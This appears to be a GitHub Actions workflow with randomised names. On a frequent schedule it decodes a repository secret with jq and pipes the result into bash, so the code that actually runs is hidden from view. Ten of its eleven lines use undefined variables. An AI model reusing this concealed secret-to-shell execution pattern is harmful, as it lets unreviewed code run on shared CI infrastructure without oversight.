name: daoxiaoquan1314
on:
  workflow_dispatch:
  schedule:
    - cron: '13 4/6 * * *'

jobs:  # 27495
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: daoxiaoquan1314
        env:
          ckdkq27: ${{ secrets.ckdkq27 }}
        run: |
          echo $ckdkq27 | jq -r .ttro6 | /bin/bash
          echo $s5 | jq -r .xflh208 | /bin/bash
          echo $ne10 | jq -r .ma09868 | /bin/bash
          echo $h73 | jq -r .c9 | /bin/bash
          echo $puzk764 | jq -r .aumoz001 | /bin/bash
          echo $xsn544 | jq -r .rs4440 | /bin/bash
          echo $n2 | jq -r .ue6185 | /bin/bash
          echo $b3 | jq -r .lym4 | /bin/bash
          echo $nm73182 | jq -r .cd99171 | /bin/bash
          echo $tchvm123 | jq -r .wgpp327 | /bin/bash
          echo $mbo55 | jq -r .lmrk0797 | /bin/bash

